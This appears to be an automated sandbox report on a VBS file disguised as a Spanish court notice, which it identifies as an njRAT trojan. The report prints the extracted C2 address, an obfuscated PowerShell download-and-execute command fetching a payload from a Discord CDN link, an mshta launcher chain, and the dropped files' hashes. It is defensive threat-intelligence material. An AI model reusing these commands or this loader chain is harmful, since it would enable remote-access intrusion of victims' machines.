Overview

overview

10

Static

static

En la pres...de.vbs

windows7_x64

8

En la pres...de.vbs

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    13-09-2021 15:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    En la presente fecha el juzgado citante notifica el auto admisorio de la demanda proferido dentro de.vbs

  • Size

    827B

  • MD5

    d514951376914b9a27c6224acf10795e

  • SHA1

    dcdb8f2c70372d5104ab1ee68e6f23c767a88a1b

  • SHA256

    cbd527d1dbfef781aaa1d1ef6c8c5a0edd32658a230c58d504d00037cf0fcb78

  • SHA512

    f69ba8b7921aadc8032578a5f7e7515bebc0377a513cad099575fbee543df6ede19659853aa728ef514a835a9737b8417af16e80cf914cd7afdbc1302d75d03e

Score
10/10
njratnyan cattrojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

fuckand.duckdns.org:3018

Mutex

e67a9b3afdbe442c9

Attributes
  • reg_key

    e67a9b3afdbe442c9

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\En la presente fecha el juzgado citante notifica el auto admisorio de la demanda proferido dentro de.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/884807521624281088/Cryp18.txt');$results
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4744
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5116
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3344
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3752
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3596
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3464

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5

    558a8b7b3fdef4ca79110f8cfd126694

    SHA1

    d6e96ca27f701b3f4c24885dacd14c762a9d36b0

    SHA256

    38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

    SHA512

    37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

    Download Submit
  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5

    7f85382953fde20b101039d48673dbd2

    SHA1

    5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

    SHA256

    fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

    SHA512

    6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

    Download Submit
  • C:\Users\Public\myScript.ps1
    MD5

    5b2a73beff8b0a7acc286c8d386a0c20

    SHA1

    07df7e1ca7c3ebc45e357be28360796b2595cecf

    SHA256

    e7c3f1834f2133a88ce4533d6968df70546c1360efba4bb6b47443fae858fbba

    SHA512

    acff8ec4becaf4992a730fbb71ae24a2ed6e3f78a1a54a27428a0685a72394a583df7c8c5fc333437d988c13e92efc4abf8166c1fab5069c4ee428323fd013ba

    Download Submit
  • memory/3344-180-0x0000000000000000-mapping.dmp
    Download
  • memory/3464-210-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

    Download
  • memory/3464-211-0x000000000040677E-mapping.dmp
    Download
  • memory/3464-220-0x0000000005890000-0x0000000005891000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3464-219-0x0000000005800000-0x0000000005CFE000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/3464-218-0x0000000005990000-0x0000000005991000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3464-217-0x0000000005D00000-0x0000000005D01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3464-216-0x00000000056E0000-0x00000000056E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3596-209-0x0000029D5B370000-0x0000029D5B373000-memory.dmp
    Filesize

    12KB

    Download
  • memory/3596-208-0x0000029D5B360000-0x0000029D5B365000-memory.dmp
    Filesize

    20KB

    Download
  • memory/3596-184-0x0000000000000000-mapping.dmp
    Download
  • memory/3596-200-0x0000029D5B350000-0x0000029D5B352000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3596-203-0x0000029D5B3D0000-0x0000029D5B3D2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3596-205-0x0000029D5B3D3000-0x0000029D5B3D5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3596-207-0x0000029D5B3D6000-0x0000029D5B3D8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3752-181-0x0000000000000000-mapping.dmp
    Download
  • memory/4744-153-0x00000216908A3000-0x00000216908A5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4744-121-0x0000021690DC0000-0x0000021690DC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4744-115-0x0000000000000000-mapping.dmp
    Download
  • memory/4744-140-0x00000216A90D0000-0x00000216A90D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4744-151-0x00000216A93E0000-0x00000216A93E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4744-152-0x00000216908A0000-0x00000216908A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4744-160-0x0000021690E40000-0x0000021690E42000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4744-159-0x00000216908A6000-0x00000216908A8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/5116-177-0x0000000000000000-mapping.dmp
    Download